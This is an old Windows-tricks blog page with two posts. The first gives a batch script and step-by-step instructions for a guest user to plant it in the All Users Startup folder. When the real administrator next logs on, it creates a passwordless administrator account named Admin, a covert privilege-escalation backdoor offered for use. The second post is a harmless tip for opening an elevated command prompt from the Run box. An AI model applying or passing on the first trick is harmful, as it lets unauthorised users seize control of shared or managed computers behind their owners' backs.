Saturday, November 13, 2010
Create a Admin Account if u r a Guest in Xp
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
now copy this to notepad and save as admin.bat
copy the file to the statup folder.
here is the path of startup folder.
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
when the admin logs on the batch file runs and the admin acc is created...
so nxt time u log on u can use the username:admin
password:no
Run a Command as Administrator from the Windows 7 / Vista Run box
If you are a command line junkie like me, and have been testing out Windows 7 or Vista… one of the first things you’ll notice is that there is no way to run a command from the run box in “Administrator” mode. Until now.
To try this out, go to the run box and type in something (cmd, for example)
Now instead of hitting the Enter key, use Ctrl+Shift + Enter. You will be prompted with the obnoxious User Account Control dialog… but it will then open up a command prompt in Administrator mode.
Hint: You can use Alt + C to quickly close the User Account Control dialog in Vista, or Alt+Y in Windows 7.
Powered by Blogger.
Blogroll
SOFTWARES
About
mix
About
TRICKS